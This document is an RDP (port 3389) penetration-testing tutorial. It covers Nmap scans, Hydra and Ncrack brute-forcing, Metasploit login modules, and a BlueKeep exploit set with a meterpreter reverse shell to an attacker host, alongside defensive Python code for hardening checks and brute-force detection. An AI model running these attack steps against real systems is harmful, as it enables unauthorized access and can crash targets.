RDP 3389

RDP Enumeration and Scanning (Port 3389)

Step 1: Define the Target IP

Replace <target_ip> in the commands below with the target's IP address. To avoid retyping it, export it once as a shell variable and use "$TARGET_IP" wherever <target_ip> appears.

# Define the target IP (sample address; substitute your target)
export TARGET_IP="192.168.1.100"

Step 2: Perform an Nmap Scan for RDP Services

Basic Scan

nmap -p 3389 -sV --script "rdp-*" <target_ip>

Explanation:

  • -p 3389: Specifies the RDP port.

  • -sV: Detects the service version.

  • --script "rdp-*": Runs every NSE script whose name starts with rdp- (the quotes keep the shell from expanding the wildcard against local filenames).

Common Nmap Scripts for RDP

  • rdp-enum-encryption: Enumerates the security layers (Native RDP, SSL/TLS, CredSSP/NLA) and encryption levels the server accepts.

  • rdp-vuln-ms12-020: Checks for MS12-020 (CVE-2012-0002), a pre-authentication flaw in the RDP service.

  • rdp-ntlm-info: Extracts host details (NetBIOS and DNS names, domain, OS version) from the NTLM challenge the RDP service returns.

Example:

nmap -p 3389 --script rdp-enum-encryption,rdp-vuln-ms12-020 <target_ip>
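As a defender-side complement to the scan above, here is an added Python example (not part of the original page, and not Nmap's own code) that parses the report rdp-enum-encryption prints and turns it into hardening findings. Both reports it runs on are constructed to mirror the script's layout; the registry values it recommends (SecurityLayer, UserAuthentication and MinEncryptionLevel under the RDP-Tcp WinStation key) are the standard Terminal Services settings, and the severities are this example's own choice.

```python
"""Turn the output of Nmap's rdp-enum-encryption script into hardening findings.

Added example, not code from the original page or from Nmap: the two sample
reports are constructed to mirror the script's report layout, and the
findings (and the registry values they point at) are this example's own
hardening checks.
"""
import re

# Constructed: a host that still accepts the legacy "Native RDP" security
# layer and export-grade RC4 (what "RDP Encryption level: Client Compatible" allows).
WEAK_REPORT = """\
PORT     STATE SERVICE
3389/tcp open  ms-wbt-server
| rdp-enum-encryption:
|   Security layer
|     CredSSP (NLA): SUCCESS
|     CredSSP with Early User Auth: SUCCESS
|     Native RDP: SUCCESS
|     RDSTLS: SUCCESS
|     SSL: SUCCESS
|   RDP Encryption level: Client Compatible
|     40-bit RC4: SUCCESS
|     56-bit RC4: SUCCESS
|     128-bit RC4: SUCCESS
|     FIPS 140-1: SUCCESS
|_  RDP Protocol Version:  RDP 5.x, 6.x, 7.x, or 8.x server
"""

# Constructed: the same host after enforcing TLS + NLA and a High encryption level.
HARDENED_REPORT = """\
| rdp-enum-encryption:
|   Security layer
|     CredSSP (NLA): SUCCESS
|     CredSSP with Early User Auth: SUCCESS
|     Native RDP: FAILED
|     RDSTLS: SUCCESS
|     SSL: SUCCESS
|   RDP Encryption level: High
|     40-bit RC4: FAILED
|     56-bit RC4: FAILED
|     128-bit RC4: SUCCESS
|     FIPS 140-1: SUCCESS
|_  RDP Protocol Version:  RDP 5.x, 6.x, 7.x, or 8.x server
"""

# One "<name>: SUCCESS|FAILED" result line, after the "|" prefix is stripped.
RESULT_RE = re.compile(r"^(?P<name>[^:]+):\s+(?P<status>SUCCESS|FAILED)$")


def parse_enum_encryption(text):
    """Return {"security_layer": {name: bool}, "encryption": {name: bool}, "level": str}."""
    parsed = {"security_layer": {}, "encryption": {}, "level": None}
    section = None
    for raw in text.splitlines():
        if not raw.startswith("|"):          # only NSE output lines carry the "|" prefix
            continue
        line = raw.lstrip("|_ ").rstrip()
        if line == "Security layer":
            section = "security_layer"
        elif line.startswith("RDP Encryption level:"):
            section = "encryption"
            parsed["level"] = line.split(":", 1)[1].strip()
        elif line.startswith("RDP Protocol Version"):
            section = None
        else:
            m = RESULT_RE.match(line)
            if m and section:
                parsed[section][m.group("name").strip()] = m.group("status") == "SUCCESS"
    return parsed


def assess(parsed):
    """Hardening findings as (severity, message) tuples; an empty list means nothing to fix."""
    layer, enc = parsed["security_layer"], parsed["encryption"]
    findings = []
    if layer.get("Native RDP"):
        findings.append(("HIGH", "Legacy 'Native RDP' security layer accepted: no server "
                         "identity check and a pre-authentication attack surface. "
                         "Set SecurityLayer=2 (TLS) under the RDP-Tcp WinStation key."))
    if not layer.get("CredSSP (NLA)"):
        findings.append(("HIGH", "NLA (CredSSP) not offered: the user authenticates only "
                         "after a full session is set up. Set UserAuthentication=1."))
    if enc.get("40-bit RC4") or enc.get("56-bit RC4"):
        findings.append(("MEDIUM", f"Export-grade RC4 accepted (encryption level "
                         f"'{parsed['level']}'). Set MinEncryptionLevel=3 (High) or 4 (FIPS)."))
    return findings


if __name__ == "__main__":
    for label, report in (("weak", WEAK_REPORT), ("hardened", HARDENED_REPORT)):
        print(f"== {label} ==")
        for severity, message in assess(parse_enum_encryption(report)) or [("OK", "no findings")]:
            print(f"[{severity}] {message}")
```

Pipe a real scan in with `nmap -p 3389 --script rdp-enum-encryption <target_ip> | python3 rdp_posture.py` after replacing the constructed reports with `sys.stdin.read()`; the parser only looks at the "|"-prefixed NSE lines, so the rest of Nmap's output is ignored.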

Step 3: Test RDP Access Using Tools

Rdesktop

  1. Install rdesktop:

    sudo apt install rdesktop
  2. Connect to the RDP server:

    rdesktop <target_ip>

xFreeRDP

  1. Install xfreerdp:

    sudo apt install freerdp2-x11
  2. Connect to the RDP server:

    xfreerdp /u:<username> /p:<password> /v:<target_ip>

Step 4: Brute-Force RDP Credentials

Hydra

  1. Use hydra to brute-force RDP credentials:

    hydra -L usernames.txt -P passwords.txt -t 4 rdp://<target_ip>

Ncrack

  1. Use ncrack for credential brute-forcing:

    ncrack -vv --user <username> -P passwords.txt rdp://<target_ip>
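The detection counterpart to this step: an added Python example (not from the original page, and unrelated to Hydra or Ncrack) that scans Windows Security event 4625/4624 records for RDP logon failures and flags a single-account brute force, a password spray across many accounts, and a success that follows flagged failures. The records and thresholds are constructed for illustration; logon type 10 is RemoteInteractive, and with NLA enforced the failures surface as type 3 from the CredSSP pre-authentication, so both types are counted.

```python
"""Detect RDP credential brute-force and password-spray activity in Windows
Security log records (Event ID 4625 = failed logon, 4624 = successful logon).

Added example, not from the original page: the records below are constructed
and the thresholds are illustrative starting points, not vendor defaults.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

FAIL_THRESHOLD = 5                 # failures from one source inside the window
SPRAY_THRESHOLD = 4                # distinct accounts from one source inside the window
WINDOW = timedelta(seconds=60)
RDP_LOGON_TYPES = {3, 10}          # 10 = RemoteInteractive; 3 = Network (NLA/CredSSP pre-auth)


def _ev(time, event_id, logon_type, src_ip, user):
    """Build one constructed record with the 4625/4624 fields the detector needs."""
    return {"time": time, "event_id": event_id, "logon_type": logon_type,
            "src_ip": src_ip, "user": user}


# Constructed sample log (documentation-range IPs):
#   203.0.113.7  hammers "administrator" six times, then logs in (4624)
#   198.51.100.9 tries one password against five different accounts (spray)
#   192.0.2.50   two typos from a legitimate user, plus a console logon (type 2)
EVENTS = (
    [_ev(f"2024-05-01T10:00:0{i}", 4625, 10, "203.0.113.7", "administrator") for i in range(6)]
    + [_ev("2024-05-01T10:00:06", 4624, 10, "203.0.113.7", "administrator")]
    + [_ev(f"2024-05-01T10:00:{10 + i}", 4625, 3, "198.51.100.9", u)
       for i, u in enumerate(["alice", "bob", "carol", "dave", "erin"])]
    + [_ev("2024-05-01T10:00:20", 4625, 10, "192.0.2.50", "jsmith"),
       _ev("2024-05-01T10:00:21", 4625, 10, "192.0.2.50", "jsmith"),
       _ev("2024-05-01T10:00:22", 4625, 2, "192.0.2.50", "jsmith")]
)


def detect(events, fail_threshold=FAIL_THRESHOLD, spray_threshold=SPRAY_THRESHOLD, window=WINDOW):
    """Sliding-window detector; returns alerts in time order, one per (source, kind)."""
    ordered = sorted(((datetime.fromisoformat(e["time"]), e) for e in events), key=lambda p: p[0])
    recent = defaultdict(deque)    # src_ip -> deque of (time, user) failures inside the window
    flagged = set()                # (src_ip, kind) pairs already alerted on
    alerts = []
    for t, e in ordered:
        if e["logon_type"] not in RDP_LOGON_TYPES:
            continue               # console/service logons are not RDP
        ip = e["src_ip"]
        q = recent[ip]
        while q and t - q[0][0] > window:
            q.popleft()            # drop failures that fell out of the window
        if e["event_id"] == 4625:
            q.append((t, e["user"]))
            users = sorted({u for _, u in q})
            if len(q) >= fail_threshold:
                kind = "password-spray" if len(users) >= spray_threshold else "brute-force"
                if (ip, kind) not in flagged:
                    flagged.add((ip, kind))
                    alerts.append({"kind": kind, "src_ip": ip, "time": e["time"],
                                   "count": len(q), "users": users})
        elif e["event_id"] == 4624 and q and any(f[0] == ip for f in flagged):
            # A success from a source we already flagged is the highest-priority signal.
            alerts.append({"kind": "success-after-failures", "src_ip": ip, "time": e["time"],
                           "count": len(q), "users": [e["user"]]})
    return alerts


if __name__ == "__main__":
    for a in detect(EVENTS):
        print(f"{a['time']} {a['kind']:<24} {a['src_ip']:<14} failures={a['count']} users={a['users']}")
```

Feed real data by exporting 4624/4625 events (for example from `Get-WinEvent` on the host) into the same five fields; the source IP comes from the event's IpAddress field and the logon type from LogonType. A 4624 from an IP that is still inside a flagged window is worth paging on, since it is the pattern a successful Hydra or Ncrack run leaves behind.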

Step 5: Exploiting RDP Vulnerabilities

BlueKeep (CVE-2019-0708)

  1. Check for BlueKeep. Note that the Nmap script rdp-vuln-ms12-020 tests MS12-020 (CVE-2012-0002), not BlueKeep; the Metasploit check module for CVE-2019-0708 tests the right flaw without exploiting it:

    use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
    set RHOSTS <target_ip>
    run
  2. Exploit using Metasploit:

    use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
    set RHOSTS <target_ip>
    set PAYLOAD windows/x64/meterpreter/reverse_tcp
    set LHOST <your_ip>
    run

Step 6: Manual RDP Enumeration with Metasploit

  1. Launch Metasploit:

    msfconsole
  2. Use the auxiliary module for RDP login enumeration:

    use auxiliary/scanner/rdp/rdp_login
    set RHOSTS <target_ip>
    set USERNAME <username>
    set PASSWORD <password>
    run
  3. Enumerate NTLM Info:

    use auxiliary/scanner/rdp/rdp_ntlm_info
    set RHOSTS <target_ip>
    run

Notes

  • Default RDP credentials may be weak or guessable.

  • Document all findings during enumeration.

  • Ensure tools like hydra, ncrack, and freerdp are installed for effective scanning.

  • BlueKeep exploitation requires specific conditions, and the RCE module can crash the target if the wrong target profile is selected; handle with caution.
